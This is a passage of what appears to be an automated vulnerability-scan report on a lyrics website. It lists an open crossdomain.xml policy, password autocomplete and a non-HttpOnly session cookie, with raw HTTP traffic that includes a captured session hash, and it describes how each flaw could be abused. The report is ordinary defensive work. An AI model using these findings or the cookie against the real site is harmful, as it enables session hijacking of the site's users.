// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/needmembership3.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460375?"></script>

<div id="header">

<h1>Membership Required</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">

</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">


<div id="LRcolumns">
<div id="left">
<div class="blueBox">

<h2>You're not signed in!</h2>

<div id="signed">
<img src="/images/n2/img-inf.jpg" alt="" />

<h3>You must be a member in order to use this section of the site!</h3>

Membership is 100% free and quick!<br />
<div id="fb_login_btn" style="margin: 5px 0 -10px 258px;"><fb:login-button size="large" perms="email"></fb:login-button></div>
<ul>
<li>
<form method="post" onsubmit="md5hash(vb_login_password,vb_login_md5password,vb_login_md5password_utf)" action="/login.php">
<input type="hidden" name="wherewasi" value="" />
<input type="hidden" name="cookieuser" value="1" id="cb_cookieuser_navbar2" accesskey="c" />
<input type="hidden" name="action" value="login" />
<input type="hidden" name="s" value="" />
<input type="hidden" name="do" value="login" />
<input type="hidden" name="forceredirect" value="1" />
<input type="hidden" name="vb_login_md5password" value="" />
<input type="hidden" name="vb_login_md5password_utf" value="" />
<h3>Already Registered?</h3>
<label>Username:</label><input name="vb_login_username" type="text" />
<label>Password:</label><input name="vb_login_password" type="password" />
<input class="btn" name="" type="image" src="/images/n2/btn-sign.jpg" />
<a href="/forum/login.php?do=lostpw">Forgot your password?</a>
</form>
</li>
<li>
<h3>Not Yet Registered?</h3>
Registration is free and easy.
<form method="post" action="/register.php"><input class="register" name="" type="image" src="/images/n2/btn-register.jpg" /></form><br /><br /><br />
<a target="_blank" rel="nofollow" href="https://www.mcafeesecure.com/RatingVerify?ref=www.metrolyrics.com"><img width="94" height="54" border="0" src="h..
Open Policy Crossdomain.xml Identified

Open Policy Crossdomain.xml Identified

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified Open Policy Crossdomain.xml file.

Impact

Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.

Remedy

Configure your Crossdomain.xml to prevent access from everywhere to your domain.

External References

- /crossdomain.xml

/crossdomain.xml CONFIRMED

http://www.metrolyrics.com/crossdomain.xml

Policy Rules

  • <allow-access-from domain="*" />

Request

GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460374; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "c4-4c72c0fe-0"
Last-Modified: Mon, 23 Aug 2010 18:42:06 GMT
Content-Type: application/xml
Content-Length: 196
Date: Mon, 07 Mar 2011 01:13:10 GMT
Connection: keep-alive


<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /request.php

/request.php CONFIRMED

http://www.metrolyrics.com/request.php

Identified Field Name

vb_login_password

Request

GET /request.php HTTP/1.1
Referer: http://www.metrolyrics.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460374
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 5970
Vary: Accept-Encoding
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:12:55 GMT
Connection: keep-alive



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Membership is required for this function" />
<meta name="keywords" content="lyrics" />
<meta property="fb:page_id" content="81914997331" />
<title>Membership Required For This Function</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"lyrics","section":false,"sectionURL":false,"title":"Membership Required"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/needmembership3.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460375?"></script>

<div id="header">

<h1>Membership Required</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">

</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">


<div id="LRcolumns">
<div id="left">
<div class="blueBox">

<h2>You're not signed in!</h2>

<div id="signed">
<img src="/images/n2/img-inf.jpg" alt="" />

<h3>You must be a member in order to use this section of the site!</h3>

Membership is 100% free and quick!<br />
<div id="fb_login_btn" style="margin: 5px 0 -10px 258px;"><fb:login-button size="large" perms="email"></fb:login-button></div>
<ul>
<li>
<form method="post" onsubmit="md5hash(vb_login_password,vb_login_md5password,vb_login_md5password_utf)" action="/login.php">
<input type="hidden" name="wherewasi" value="" />
<input type="hidden" name="cookieuser" value="1" id="cb_cookieuser_navbar2" accesskey="c" />
<input type="hidden" name="action" value="login" />
<input type="hidden" name="s" value="" />
<input type="hidden" name="do" value="login" />
<input type="hidden" name="forceredirect" value="1" />
<input type="hidden" name="vb_login_md5password" value="" />
<input type="hidden" name="vb_login_md5password_utf" value="" />
<h3>Already Registered?</h3>
<label>Username:</label><input name="vb_login_username" type="text" />
<label>Password:</label><input name="vb_login_password" type="password" />
<input class="btn" name="" type="image" src="/images/n2/btn-sign.jpg" />
<a href="/forum/login.php?do=lostpw">Forgot your password?</a>
</form>
</li>
<li>
<h3>Not Yet Registered?</h3>
Registration is free and easy.
<form method="post" action="/register.php"><input class="register" name="" type="image" src="/images/n2/btn-register.jpg" /></form><br /><br /><br />
<a target="_blank" rel="nofollow" href="https://www.mcafeesecure.com/RatingVerify?ref=www.metrolyrics.com"><img width="94" height="54" border="0" src="h..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /forum/

/forum/ CONFIRMED

http://www.metrolyrics.com/forum/

Identified Cookie

bbsessionhash

Request

GET /forum/ HTTP/1.1
Referer: http://www.metrolyrics.com/forum/login.php?do=lostpw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460374
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10856
Expires: Mon, 07 Mar 2011 01:12:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Mar 2011 01:12:56 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; path=/,bblastactivity=1299460375; expires=Tue, 06-Mar-2012 01:12:55 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en">
<head>
<!-- CSS Stylesheet -->
<style type="text/css">
<!--
/* vBulletin 3 CSS For Style 'MetroLyrics - Default' (styleid: 1) */
body
{
background: #131F2B url(http://www.metrolyrics.com/images/n/bg-footer.jpg) repeat-x center bottom;
color: #818D92;
font: 12px Arial,Helvetica,sans-serif;
margin: 0px;
padding: 0px;
}
a:link
{
color: #3c91ca;
text-decoration: none;
}
a:visited
{
color: #3c91ca;
text-decoration: none;
}
a:hover, a:active
{
color: #3c91ca;
text-decoration: underline;
}
.page
{
background-color: #eeeeee;
color: #5a5a5a;
}
td, th, p, li
{
font-family: Arial,Helvetica,sans-serif;
}
.tborder
{
background-color: #e6e6e6;
}
.tcat
{
background-color: #b7dbf1;
color: #484848;
font: bold 10pt Arial,Helvetica,sans-serif;
padding:5px;
}
.tcat a:link
{
color: #5a5a5a;
text-decoration: none;
}
.tcat a:visited
{
color: #5a5a5a;
text-decoration: none;
}
.tcat a:hover, .tcat a:active
{
color: #5a5a5a;
text-decoration: underline;
}
.thead
{
background-color: #cee7f7;
color: #5a5a5a;
font: bold 11px Arial,Helvetica,sans-serif;
}
.thead a:link
{
color: #5a5a5a;
}
.thead a:visited
{
color: #5a5a5a;
}
.thead a:hover, .thead a:active
{
color: #5a5a5a;
}
.tfoot
{
background-color: #b7dbf1;
color: #5a5a5a;
}
.tfoot a:link
{
color: #5a5a5a;
}
.tfoot a:visited
{
color: #5a5a5a;
}
.tfoot a:hover, .tfoot a:active
{
color: #5a5a5a;
}
.alt1, .alt1Active
{
background-color: #ffffff;
color: #5a5a5a;
font-size: 12px;
line-height:18px;
border-bottom:1px solid #e6e6e6;
padding:6px 5px;
}
.alt2, .alt2Active
{
background-color: #f7faff;
color: #5a5a5a;
font-size: 12px;
line-height:18px;
border-bottom:1px solid #e6e6e6;
padding:6px 5px;
}
.wysiwyg
{
background-color: #FFFFFF;
color: #5a5a5a;
font: 10pt Arial,Helvetica,sans-serif;
}
textarea, .bginput
{
background-color: #eeeeee;
font: 10pt Arial,Helvetica,sans-serif;
border:1px solid #d7d7d7;
padding:5px;
margin-top:5px;
margin-bottom:5px;
}
.button
{
background-color: #ff7e05;
color: #ffffff;
font: 12px Arial,Helvetica,sans-serif;
border: 0;
background-image: -webkit-gradient(linear, left top, left bottom, from(#ffb86c), to(#ff7e05));
background-image: -moz-linear-gradient(top, #ffb86c, #ff7e05);
padding: 3px 8px;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
font-weight: bold;
text-transform: uppercase;
text-decoration: none;
vertical-align: middle;
}
select
{
font: 11px Arial,Helvetica,sans-serif;
}
option, optgroup
{
font-size: 11px;
font-family: Arial,Helvetica,sans-serif;
}
.smallfont
{
font: 11px Arial,Helvetica,sans-serif;
line-height:18px;
}
.time
{
color: #3C3D48;
font-weight: bold;
}
.navbar
{
font: 11px Arial,Helvetica,sans-serif;
}
.highlight
{
color: #3C3D48;
font-weight: bold;
}
.fjsel
{
background-color: #3C3D48;
color: #C9CED8;
}
.fjdpth0
{
background-color: #F7F7F7;
color: #5a5a5a;
}
.panel
{
color: #5a5a5a;
padding: 10px;
}
.panelsurround
{
background-color: #ffffff;
color: #5a5a5a;
border:1px solid #e6e6e6;
border-bottom:2px solid #d7d7d7;
}
legend
{
color: #5a5a5a;
font: bold 13px Arial,Helvetica,sans-serif;
}
.vbmenu_control
{
background-color: #cee7f7;
color: #5a5a5a;
